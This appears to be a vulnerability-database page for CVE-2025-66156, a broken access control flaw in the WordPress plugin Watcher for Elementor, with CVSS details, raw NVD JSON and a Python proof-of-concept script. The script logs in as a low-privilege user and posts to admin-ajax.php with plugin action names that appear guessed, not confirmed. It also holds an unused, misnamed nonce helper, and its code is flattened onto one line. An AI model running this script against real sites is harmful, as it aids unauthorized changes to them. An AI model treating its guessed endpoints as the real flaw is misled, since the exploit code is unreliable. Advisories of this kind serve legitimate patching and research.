Security Vulnerability Report
中文
CVE-2025-66156 CVSS 5.4 MEDIUM

CVE-2025-66156

Published: 2025-12-31 17:15:49
Last Modified: 2026-04-23 15:35:29

Description

Missing Authorization vulnerability in merkulove Watcher for Elementor watcher-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Watcher for Elementor: from n/a through <= 1.0.9.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Watcher for Elementor <= 1.0.9 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-66156 PoC - Watcher for Elementor Broken Access Control # Target: WordPress site with vulnerable Watcher for Elementor plugin (<=1.0.9) TARGET_URL = "http://target-wordpress-site.com" USERNAME = "subscriber_user" PASSWORD = "user_password" def get_wordpress_nonce(login_url): """Retrieve WordPress login nonce""" response = requests.get(login_url, timeout=10) return response.cookies.get('wordpress_test_cookie') def authenticate(): """Authenticate as low-privilege user (subscriber)""" login_url = f"{TARGET_URL}/wp-login.php" session = requests.Session() login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f"{TARGET_URL}/wp-admin/", 'testcookie': '1' } response = session.post(login_url, data=login_data, allow_redirects=True) return session if 'wordpress_logged_in' in str(response.cookies) else None def exploit_broken_access_control(session): """Exploit missing authorization in plugin AJAX endpoints""" ajax_endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", ] # Common vulnerable actions in watcher-elementor plugin vulnerable_actions = [ 'watcher_save_settings', 'watcher_update_options', 'watcher_modify_data', ] results = [] for action in vulnerable_actions: payload = { 'action': action, 'nonce': '', # May not be required due to missing auth check } try: response = session.post(ajax_endpoints[0], data=payload, timeout=10) if response.status_code == 200 and 'success' in response.text: results.append(f"Vulnerable endpoint found: {action}") except requests.RequestException: pass return results if __name__ == "__main__": print("CVE-2025-66156 PoC - Watcher for Elementor Authorization Bypass") print("=" * 60) session = authenticate() if session: print(f"[+] Successfully authenticated as: {USERNAME}") findings = exploit_broken_access_control(session) if findings: print("[!] Vulnerable endpoints identified:") for finding in findings: print(f" - {finding}") else: print("[-] No vulnerable endpoints found (may require manual testing)") else: print("[-] Authentication failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66156", "sourceIdentifier": "[email protected]", "published": "2025-12-31T17:15:49.387", "lastModified": "2026-04-23T15:35:28.870", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in merkulove Watcher for Elementor watcher-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Watcher for Elementor: from n/a through <= 1.0.9."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en merkulove Watcher para Elementor permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Watcher para Elementor: desde n/a hasta 1.0.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/watcher-elementor/vulnerability/wordpress-watcher-for-elementor-plugin-1-0-9-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}